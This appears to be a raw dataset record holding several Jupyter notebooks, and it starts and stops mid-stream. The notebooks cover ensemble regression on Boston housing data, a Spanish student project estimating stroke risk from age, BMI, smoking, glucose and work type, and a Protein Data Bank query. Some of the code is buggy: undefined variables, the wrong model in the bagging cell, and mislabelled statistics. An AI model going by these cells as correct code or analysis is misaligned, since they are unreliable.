"Best Number of Estimators:792\nConfusion Matrix:\n[[465 84]\n [101 241]]\nAccuracy Score = 0.792368125701459\nPecision Score = 0.7415384615384616\nRecall Score = 0.7046783625730995\nF1 Score = 0.7226386806596703\n"
]
],
[
[
"# Boston Housing Cost Estimator\n\nBuilding off the classifier examples above, this section shows ensemble regressors using bagging and random forests.",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
]
],
[
[
"# Load Data Set\nboston_housing_data = datasets.load_boston()\n\ntrain_X, test_X, train_y, test_y = train_test_split(boston_housing_data.data,\n boston_housing_data.target,\n test_size=0.33)\n\ndef plot_learning_curves(model, X, y):\n \"\"\"\n Plots performance on the training set and testing (validation) set.\n X-axis - number of training samples used\n Y-axis - RMSE\n \"\"\"\n \n train_X, test_X, train_y, test_y = train_test_split(X, y, test_size = 0.20)\n \n training_errors, validation_errors = [], []\n \n for m in range(1, len(train_X)):\n \n model.fit(train_X[:m], train_y[:m])\n \n train_pred = model.predict(train_X)\n test_pred = model.predict(test_X)\n \n training_errors.append(np.sqrt(mean_squared_error(train_y, train_pred)))\n validation_errors.append(np.sqrt(mean_squared_error(test_y, test_pred)))\n \n plt.plot(training_errors, \"r-+\", label=\"train\")\n plt.plot(validation_errors, \"b-\", label=\"test\")\n plt.legend()\n plt.axis([0, 80, 0, 3])",
"_____no_output_____"
]
],
[
[
"## Linear Regression on Boston Data Set (for comparison)\n\nFor comparison a linear regression on the boston data is shown.",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(train_X,train_y)\npred_y = lin_reg.predict(test_X)\n\n# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)\nprint(\"Theta:\")\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(lin_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Theta:\n33.790769307759966 [-1.25483446e-01 5.11865930e-02 1.63927974e-02 9.85173229e-01\n -1.76808023e+01 4.03838469e+00 -7.64654037e-03 -1.47655876e+00\n 2.94368239e-01 -1.35171374e-02 -8.57046534e-01 8.61252482e-03\n -4.63613220e-01]\nMAE = 3.440300129807153\n"
]
],
[
[
"## Bagging Regressor using Linear Regression as Base\n\nThis example implements a bagging regressor with a linear regression model as the base classifier. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"## Bagging with Linear Regression\n\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.linear_model import LinearRegression\n\nbase_reg = LinearRegression()\n\nbag_reg = BaggingRegressor(\n base_reg,\n n_estimators = 500,\n max_samples=1.0,\n n_jobs = -1,\n bootstrap=False) #Not replacement for this configuration\n\nbag_reg.fit(train_X, train_y)\n\npred_y = bag_reg.predict(test_X)\n\n# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)\nprint(\"Theta:\")\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(lin_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Theta:\n42.388643481735116 [-1.31802391e-01 6.28212122e-02 1.33939743e-02 7.39270347e-01\n -1.98008368e+01 3.28625061e+00 3.49330152e-04 -1.67420484e+00\n 3.11479966e-01 -1.26756831e-02 -8.92430146e-01 6.05986473e-03\n -5.71054167e-01]\nMAE = 3.4403001298071096\n"
]
],
[
[
"## Random Forest Regression Example\n\nThis example implements a random forest regressor using decision trees up to depth 10. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestRegressor\n\nrf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10)\nrf_reg.fit(train_X, train_y)\npred_y = rf_reg.predict(test_X)\n\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(rf_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 4.953366204278773\n"
]
],
[
[
"## Random Forest Regressor: Feature Importance and Out of Bag Validation Score\n\nThis example shows a random forest regressor using decision trees constrained to a maximum depth of 10. Out of bag score is enabled. ",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestRegressor\n\nrf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)\nrf_reg.fit(train_X, train_y)\n\nfor name, score in zip(boston_housing_data.feature_names, rf_reg.feature_importances_):\n print(name, score)\n \nprint(\"\\n\\nOut of Bag Validation:\", rf_reg.oob_score_)",
"CRIM 0.03371132769475889\nZN 0.001516399035147252\nINDUS 0.006348373160781681\nCHAS 0.000803948528826991\nNOX 0.02664378861555026\nRM 0.4497024039614303\nAGE 0.02170768047239195\nDIS 0.0569814063146847\nRAD 0.004394095389350596\nTAX 0.012188515025893831\nPTRATIO 0.016232410175830058\nB 0.011378951616129644\nLSTAT 0.3583907000092238\n\n\nOut of Bag Validation: 0.8100208177458713\n"
]
],
[
[
"## AdaBoost Regression Example\n\nImplmentation of an AdaBoost ensemble regressor with decision trees of max depth = 2 and 100 estimators in sequence. Learning rate is decreased to 0.2 to improve generalization. \n\nThis example implements an AdaBoost regressor. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.tree import DecisionTreeRegressor\n\n#Ada Boost Regressor \nreg = AdaBoostRegressor(\n DecisionTreeRegressor(max_depth=2), \n n_estimators=100,\n learning_rate=0.2)\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 3.4724523088696753\n"
]
],
[
[
"## Gradient Boosting Regressor Example\n\nThis example implements an Gradient Boosting regressor. Its ensemble of 200 estimators are decision stumps.\n\n\nIt shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingRegressor\n\nreg = GradientBoostingRegressor(max_depth=1, n_estimators=50)\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 3.3445466597845\n"
]
],
[
[
"## Gradient Boosting Regressor Example with early stopping\n\nThis example implements an Gradient Boosting regressor with early stopping enabled. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingRegressor\n\n\n# Split the training into a training and validation set\nX_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)\n\nmax_tree_depth=1\n\nreg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=1000)\nreg.fit(X_train, y_train)\n\nerrors = [mean_squared_error(y_val, y_pred)\n for y_pred in reg.staged_predict(X_val)]\nbst_n_estimators = np.argmin(errors)\n\nprint(\"Best Number of Estimators:\" + str(bst_n_estimators))\n\nreg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=bst_n_estimators)\n\n##\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Best Number of Estimators:337\nMAE = 2.7971391773570042\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb5204cba78f9995d06bf118079270da6d653dbb | 198,179 | ipynb | Jupyter Notebook | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | null | null | null | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | null | null | null | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | 1 | 2021-06-24T20:03:33.000Z | 2021-06-24T20:03:33.000Z | 106.319206 | 57,524 | 0.807856 | [
[
[
"<img style=\"float: left; margin: 30px 15px 15px 15px;\" src=\"https://pngimage.net/wp-content/uploads/2018/06/logo-iteso-png-5.png\" width=\"300\" height=\"500\" /> \n \n \n### <font color='navy'> Simulación de procesos financieros. \n\n**Nombres:** Ana Esmeralda Rodriguez Rodriguez, Antonio de Santiago Rosas Saldaña.\n\n**Fecha:** 09 de marzo del 2021.\n\n**Expediente** : If709288, Af713803.\n**Profesor:** Oscar David Jaramillo Zuluaga.\n \n**Link Github**: Lhttps://github.com/Tonydesanty/Proyecto-entrega-1/blob/main/Entrega%201%20proyecto.ipynb\n\n# Proyecto TEMA-2",
"_____no_output_____"
],
[
"**Introducción:**\n\nHoy en día existen diferentes tipos de enfermedades letales como el cáncer, coronavirus, diabetes, entre otros. Nuestro proyecto va a ir enfocado a los accidentes cerebrovasculares, el cual ocupa el segundo puesto de las enfermedades más mortales de la actualidad.\n\nUna lesión cerebrovascular es un tipo de lesión que se hace presente cuando el flujo sanguíneo del cerebro se detiene parcialmente. Cuando el flujo sanguíneo en el cerebro se detiene, el cerebro deja de recibir la oxigenación y los nutrientes que requiere para su funcionamiento y las células y neuronas comienzan a morir de manera rápida.\nFactores que pueden influir a tener un accidente cerebrovascular:\n\n•\tPresión arterial alta.\n\n•\tDiabetes.\n\n•\tEnfermedades en el corazón.\n\n•\tFumar.\n\n•\tGenética.\n\n•\tEdad.\n\n•\tConsumo de alcohol.\n\n•\tConsumo de drogas.\n\n•\tColesterol.\n\n•\tObesidad.\n\n ",
"_____no_output_____"
],
[
"**Objetivo general:**\n\nCrear un modelo el cuál nos de un diagnostico si una persona es poseedora de una enfermedad cerebrovascular.\n\n**Objetivos secundarios:**\n\n1.Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su edad.\n\n2.-Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de masa corporal.\n\n3.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de glucosa.\n\n4.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por tener la costumbre de fumar.\n\n",
"_____no_output_____"
],
[
"**Definición del problema**:\n\nLas enfermedades son algo natural dentro del ciclo de vida de una persona, existen diferentes enfermedades que contrae la gente, ya sea por sus hábitos, estado psicologico, o edad. Las enfermedades cerebrovasculares son un problema en la actualidad ya que son la segunda enfermedad con mayor tasa de mortalidad, despúes de la cardipatía isquémica. \n\nCrear un modelo que nos ayude a encontrar la probabilidad que una persona contraiga en un futuro una enfermedad cerbrovascular sería muy interesante, ya que, podremos pronosticar si una persona podría a llegar a tener una enfermedad de este tipo con caracteristicas como edad y su índice de masa corporal, y así adelantarnos a los hechos y poder tomar decisiones para poder reducir la probabilidad de contraer esta enfermedad.\n\n\nA través de una base de datos obtenida de \"https://www.kaggle.com/fedesoriano/stroke-prediction-dataset?select=healthcare-dataset-stroke-data.csv\" trabajaremos para poder crear un modelo el cuál nos permita predecir si una persona con ciertas caractericticas puede llegar a ser poseedora de una enfermedad cerebrovascular.\n",
"_____no_output_____"
],
[
"**Nodos a simular:**\n\n*Probabilidad de contraer por su edad*: Decidimos simular está variable porque consideramos que la edad o el estado del cuerpo tiene gran impacto al momento de contraer enfermedad, a mayor edad, mayor posibilidad de contraer enfermedades.\n\n*Probabilidad de contraer por su índice de masa corporal:* La masa corporal de las personas es un indicador de salud, normalmente las personas con mayor masa corporal son las más propensas a contraer enfermedades, por lo que tomar este indicador como nodo es muy importante ya que creemos que puede a llegar a influir de manera considerable en nuestros resultados.\n\n*Probabildiad de contraer por sus habitos con el cigarro*: Los cigarros son nido de varias enfermedades, por lo que es interesante saber cuál es la probabilidad de contrarer la enfermedad por tus hábitos con el cigarro.\n\n*Probabilidad mediante su nivel de glucosa*: La gluscosa es un indicador de cuanta azúcar tenemos dentro de nuestro cuerpo, tener un nivel de azúcar regulado es lo más optimo, sin embargo, cuando esta sube o baja son indicadores de que puedes tener enfermedades como diabetes, analizar esta variable puede llegarnos a dar un resultado más aproximado del cual queremos llegar.\n",
"_____no_output_____"
],
[
"**Hipotesis** \n\nLas personas más probables de contraer enfermedades cerebrovasculares son aquellas que tienen más de 70 años, fuman, tienen un alto índice de masa corporal y nivel de glucosa bajo.\n\n*Supuestos:*\n\nLas variables que simularemos son las más significativas al momento del estudio de esta enfermedad.\n\nToda la información proporcionada por los pacientes son 100% reales.\n\nOtro tipo de enfermedades no tienen un peso relativo dentro del estudio.\n\nLas variables a analizar no tienen precedentes importante (En caso de masa corporal y glucosa).\n\nLas variables tienen el mismo peso al momento de presentar resultados.\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"## Visualización de datos\n",
"_____no_output_____"
]
],
[
[
"#Librerias\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport collections\nimport scipy.stats as st\nfrom collections import Counter",
"_____no_output_____"
],
[
"from statsmodels.nonparametric.kernel_density import KDEMultivariate\n\n# funcion que retorna una funcion de densidad de probabilidad de un conjunto de datos\ndef kde_statsmodels_mf(x, **kwargs):\n \"\"\"Multivariate Kernel Density Estimation with Statsmodels\"\"\"\n kde = KDEMultivariate(x, \n bw='cv_ml',\n var_type='c', **kwargs)\n return lambda x_grid: kde.pdf(x_grid)",
"_____no_output_____"
],
[
"data = pd.read_csv('healthcare-dataset-stroke-data.csv')\ndata",
"_____no_output_____"
],
[
"clean_data = pd.DataFrame()\n# Filtrar las variables a analizar\nclean_data['age'] = data.T.loc['age']\nclean_data['smoking_status'] = data.T.loc['smoking_status']\nclean_data['bmi'] = data.T.loc['bmi']\nclean_data['wor_type'] = data.T.loc['work_type']\n# Invertir datos para tener los valores iniciales al principio\nclean_data = clean_data.iloc[::-1] \n# Reemplazar index por uno que tenga los vlores de forma descendiente\nclean_data['index'] = [i for i in range(len(clean_data['age']))]\nclean_data.set_index('index', inplace = True)\n# Eliminar hasta primer positivo\nclean_data = clean_data.iloc[37:,:]\n# llenar valores nulos\nclean_data.fillna(0,inplace = True)\n# Mostrar la cola del data frame\nclean_data",
"_____no_output_____"
]
],
[
[
"## Edad",
"_____no_output_____"
]
],
[
[
"totalages = clean_data['age']\ntotalages.head()",
"_____no_output_____"
],
[
"# plotear histograma de los datos\n\nJ = 10 # Cantidad de particiones del histograma\n[freq, x_hist, _] = plt.hist(totalages,bins = J, density = True ); # histograma\nplt.show() # mostrar histograma\nx_hist = x_hist[1:] # Se obvia el último valor de x para obtener exactamente J muestras de x\n",
"_____no_output_____"
],
[
"age = totalages\n\n# Probar diferentes distirbuciones de probabilidad\ndist_list = ['bradford', 'beta','expon', 'exponnorm','norm','uniform','foldnorm', 'gennorm', 'ksone', 'kappa4', 'johnsonsb']\n\ny_real, x_real, _ = plt.hist(age, bins = 15, density = True) #hacer histograma\n\nx_real = x_real[1:] # modificar shape para que rea igual\n\n#e = []\ndef distribucion(dist_list):\n \n def imprimir(dist):\n param = getattr(st, dist).fit(age)\n y_est = getattr(st, dist).pdf(x_real, *param)\n plt.plot(x_real,y_est, label = dist);\n print('El error de la distribucion', dist,'es de', (abs(y_real-y_est)*100/y_est).mean(),'%')\n \n [imprimir(dist) for dist in dist_list]\n\n\ndistribucion(dist_list)\nplt.legend()\nplt.show()",
"El error de la distribucion bradford es de 17.933979416705725 %\nEl error de la distribucion beta es de 22.647339806234722 %\nEl error de la distribucion expon es de 95.42359157800738 %\nEl error de la distribucion exponnorm es de 44.8434298758337 %\nEl error de la distribucion norm es de 44.84491981007708 %\nEl error de la distribucion uniform es de 17.173270254287402 %\n"
],
[
"param = getattr(st, 'ksone').fit(x_hist) # obtener los parametros\npi = st.ksone.pdf(x_hist, *param)\n# Cálculo de la esperanza usando la expresión teórica\nEi = x_hist*pi\n\n# Cálculo teórico de la chi cuadrada\nx2 = ((freq - Ei)**2 / Ei).sum()\nprint('Valor de chi cuadrado teorico = ', x2)\n\n# Cálculo usando la librería estadística de la chi cuadrada\nX2 = st.chisquare(freq, Ei)\nprint('Valor de chi cuadrado librería = ', X2)\n\n# Cálculo de Grados de libertad del estadístico\nm = J-1 # grados de libertad\n\nChi_est = st.chi2.ppf(q=0.95, df=m)\nprint('Estadístico de chi_cuadrado = ', Chi_est)",
"Valor de chi cuadrado teorico = 5.577598299643628\nValor de chi cuadrado librería = Power_divergenceResult(statistic=5.577598299643628, pvalue=0.7813356619723271)\nEstadístico de chi_cuadrado = 16.918977604620448\n"
],
[
"func_edad = kde_statsmodels_mf(age)\nx_g = np.arange(0,100,100)\nplt.figure()\nplt.plot(x_g,func_edad(x_g));\nplt.hist(edad,bins = 15, density = True);\nplt.show()",
"C:\\Users\\Santiago\\anaconda3\\lib\\site-packages\\statsmodels\\nonparametric\\kernel_density.py:158: RuntimeWarning: invalid value encountered in log\n L += func(f_i)\n"
],
[
"f = func_edad\n# encontrar el maximo de la funcion y plotearlo\nx = np.arange(0,10000,100)\nmax_fp = f(optimize.fmin(lambda x:-f(x),0,disp=False))\nplt.plot(0,max_fp,'x',lw = 10)\nplt.plot(x,func_edad(x))",
"_____no_output_____"
]
],
[
[
"## Funciones a utilizar",
"_____no_output_____"
]
],
[
[
"# Función de aceptación y rechazo usando una constante para t(x) y se desea que dicha función regrese\n# N variables aleatorias (Exactamente que acepte N valores)\ndef acep_rechazo_simplificada(\n N:'Cantidad de variables a generar',\n Dom_f:'Dominio de la función f como tupla (a,b)',\n f:'función objetivo a generar',\n max_f:'máximo valor de f'\n):\n X = np.zeros(N)\n\n return X",
"_____no_output_____"
],
[
"def histograma_vs_densidad(signal:'variable con muestras aleatorias de la distribución generada',\n f:'función de distribución de probablidad f(x) de la variable aleatoria'):\n\n plt.figure(figsize=(8,3))\n count, x, _ = plt.hist(signal,100,density=True)\n y = f(x)\n plt.plot(x, y, linewidth=2,color='k')\n plt.ylabel('Probabilidad')\n plt.xlabel('Muestras')\n# plt.legend()\n plt.show()",
"_____no_output_____"
],
[
"def Gen_distr_discreta(p_acum: 'P.Acumulada de la distribución a generar',\n indices: 'valores reales a generar aleatoriamente',\n N: 'cantidad de números aleatorios a generar'):\n \n U =np.random.rand(N)\n # Diccionario de valores aleatorios\n rand2reales = {i: idx for i, idx in enumerate(indices)}\n\n # Series de los valores aletorios\n y = pd.Series([sum([1 for p in p_acum if p < ui]) for ui in U]).map(rand2reales)\n\n return y",
"_____no_output_____"
],
[
"def plot_histogram_discrete(distribucion:'distribución a graficar histograma',\n label:'label del legend'):\n # len(set(distribucion)) cuenta la cantidad de elementos distintos de la variable 'distribucion'\n plt.figure(figsize=[8,4])\n y,x = np.histogram(distribucion,density = True,bins = len(set(distribucion)) - 1) \n plt.bar(list(set(distribucion)),y,label=label)\n plt.legend()\n plt.show()",
"_____no_output_____"
]
],
[
[
"## Nodo 1 \"Edad\"",
"_____no_output_____"
]
],
[
[
"edad = data['age']\nprint('La media de tener un problema cerebrovascular es de:', edad.mean())\n",
"La media de tener un problema cerebrovascular es de: 43.21526418786693\n"
],
[
"plt.hist(edad, density=True, bins=82)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Edad del Paciente')\nplt.show()",
"_____no_output_____"
],
[
"#Calculo de probabilidad\nlista_edad=pd.DataFrame(edad)\ncantidad_edad = pd.value_counts(lista_edad[\"age\"])\ncantidad_edad\n#robabilidad_edad=pd.DataFrame((cantidad_edad/5110)*100)\n#robabilidad_edad\n#Age.sort_index().head(83)\n#dad_acumulada=np.cumsum(probabilidad_edad)\n#dad_acumulada\nproba_edad= ((cantidad_edad/5110)*100)\nproba_edad\nacumulada_edad = np.cumsum(proba_edad)\nacumulada_edad",
"_____no_output_____"
],
[
"info= pd.DataFrame({'Cantidad por edad':cantidad_edad, 'Probabilidad por edad':proba_edad, 'Probabilidad acumulada': acumulada_edad})\ninfo\n",
"_____no_output_____"
],
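[
"# Illustrative example (added for clarity; not part of the original analysis): use the helper\n# functions defined above to simulate ages from the empirical distribution of the 'age' node.\n# acumulada_edad is expressed in percent, so it is divided by 100 before being used.\nedades_simuladas = Gen_distr_discreta(p_acum=(acumulada_edad / 100).values,\n                                      indices=list(acumulada_edad.index),\n                                      N=1000)\nplot_histogram_discrete(edades_simuladas, label='Simulated ages')",
"_____no_output_____"
],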
[
"# nombrar variable que contenga datos del df determinados\ntotal_age = info['cantidad por edad']\ntotal_age.head()",
"_____no_output_____"
]
],
[
[
"## Nodo 2 \"Masa\"",
"_____no_output_____"
]
],
[
[
"masa = data['bmi']\nprint('La media de tener un problema cerebrovascular es de:', masa.mean())\n",
"La media de tener un problema cerebrovascular es de: 28.893236911794673\n"
],
[
"plt.hist(masa, density=True, bins=20)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Masa muscular del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_masa=pd.DataFrame(masa)\ncantidad_masa = pd.value_counts(lista_masa[\"bmi\"])\ncantidad_masa\nproba_masa= ((cantidad_masa/4909)*100)\nproba_masa\nacumulada_masa = np.cumsum(proba_masa)\nacumulada_masa",
"_____no_output_____"
],
[
"info_masa= pd.DataFrame({'Cantidad por masa':cantidad_masa, 'Probabilidad por masa':proba_masa, 'Probabilidad acumulada masa': acumulada_masa})\ninfo_masa",
"_____no_output_____"
]
],
[
[
"## Nodo 3 \"Fumar\"",
"_____no_output_____"
],
[
"**Para el caso del nodo \"Fumar\" se van a tener estos códigos:**\n\n0.- No se sabe si el paciente fuma o no.\n\n1.- Fuma de vez en cuando.\n\n2.- Nunca ha fumado.\n\n3.- Fuma",
"_____no_output_____"
]
],
[
[
"fuma = data['smoking_status']\nprint('La media de tener un problema cerebrovascular es de:', masa.median())",
"La media de tener un problema cerebrovascular es de: 28.1\n"
],
[
"plt.hist(fuma, density=True, bins=4)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Costumbres de fumar del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_fuma=pd.DataFrame(fuma)\ncantidad_fuma = pd.value_counts(lista_fuma[\"smoking_status\"])\ncantidad_fuma\nproba_fuma= ((cantidad_fuma/5110)*100)\nproba_fuma\nacumulada_fuma = np.cumsum(proba_fuma)\nacumulada_fuma\n",
"_____no_output_____"
],
[
"info_fuma= pd.DataFrame({'Cantidad por fumar':cantidad_fuma, 'Probabilidad por fumar':proba_fuma, 'Probabilidad acumulada fuma': acumulada_fuma})\ninfo_fuma",
"_____no_output_____"
]
],
[
[
"## Nodo 3 \"Glucosa\"",
"_____no_output_____"
]
],
[
[
"glucosa = data['avg_glucose_level']\nprint('La media de tener un problema cerebrovascular es de:', glucosa.mean())",
"La media de tener un problema cerebrovascular es de: 106.09534246575328\n"
],
[
"plt.hist(glucosa, density=True, bins=20)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Glucosa del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_glucosa=pd.DataFrame(glucosa)\ncantidad_glucosa = pd.value_counts(lista_glucosa[\"avg_glucose_level\"])\ncantidad_glucosa\nproba_glucosa= ((cantidad_glucosa/5110)*100)\nproba_glucosa\nacumulada_glucosa = np.cumsum(proba_glucosa)\nacumulada_glucosa\n\n\n",
"_____no_output_____"
]
],
[
[
"## Nodo 4 \"Por tipo de trabajo\"",
"_____no_output_____"
],
[
"**Códigos para tipo de trabajo:**\n\n0.- Niños.\n\n1.- Trabajo en el gobierno\n\n2.- Nunca ha trabajado\n\n3.- Privado\n\n4.- Autoempleado",
"_____no_output_____"
]
],
[
[
"trabajo = data['work_type']\nprint('La media de tener un problema cerebrovascular es de:', trabajo.median())",
"La media de tener un problema cerebrovascular es de: 3.0\n"
],
[
"plt.hist(trabajo, density=True, bins=5)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Tipo de trabajo del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_trabajo=pd.DataFrame(trabajo)\ncantidad_trabajo = pd.value_counts(lista_trabajo[\"work_type\"])\ncantidad_trabajo\nproba_trabajo= ((cantidad_trabajo/5110)*100)\nproba_trabajo\nacumulada_trabajo = np.cumsum(proba_trabajo)\nacumulada_trabajo",
"_____no_output_____"
],
[
"info_trabajo= pd.DataFrame({'Cantidad por trabajo':cantidad_trabajo, 'Probabilidad por trabajo':proba_trabajo, 'Probabilidad acumulada trabajo': acumulada_trabajo})\ninfo_trabajo",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb5211717dd267ecc21b1778db4f924909fcaa03 | 7,196 | ipynb | Jupyter Notebook | Python for Data Science/Week_Files/Week-9-ExampleNotebooks/Week-9-ExampleNotebooks/Protein Data Bank Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | mattssilva/Data-Science-Micromasters | 727d93adacfd8fcd1504631f3b39419323d1c81b | [
"Apache-2.0"
] | 10 | 2019-09-09T15:53:39.000Z | 2022-01-15T19:35:41.000Z | DSE200x/Week-9-ExampleNotebooks/Protein_Data_Bank_Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | kabartay/EdX-UCSanDiegoX-DSE200x | 58d7d655e2557fa142e245e5875a9c24b1194280 | [
"MIT"
] | null | null | null | DSE200x/Week-9-ExampleNotebooks/Protein_Data_Bank_Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | kabartay/EdX-UCSanDiegoX-DSE200x | 58d7d655e2557fa142e245e5875a9c24b1194280 | [
"MIT"
] | 2 | 2020-07-26T16:19:03.000Z | 2021-07-10T14:21:59.000Z | 24.899654 | 365 | 0.570039 | [
[
[
"!pwd",
"/Users/DZD/Data Visualization/Final/Coursera Materials\r\n"
],
[
"import requests\nimport csv",
"_____no_output_____"
],
[
"###Create string name list from avaliable fields: http://www.rcsb.org/pdb/results/reportField.do\n###Custom Report Web Services General info: http://www.rcsb.org/pdb/software/wsreport.do\nse= \"ndbId\"\nstring_names = \"classification,experimentalTechnique,macromoleculeType,residueCount,resolution,\"+\\\n \"structureMolecularWeight,\"+\\\n \"crystallizationMethod,crystallizationTempK,densityMatthews,densityPercentSol,\"+\\\n \"pdbxDetails,phValue,publicationYear\"\n \nsequences_string_names = \"sequence,residueCount,macromoleculeType\"",
"_____no_output_____"
],
[
"#Main Pull\npayload = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'CustomReportColumns':string_names}\nr = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload)",
"_____no_output_____"
],
[
"r.url",
"_____no_output_____"
],
[
"r.text.splitlines()[0]",
"_____no_output_____"
],
[
"string_names.split(\",\")",
"_____no_output_____"
],
[
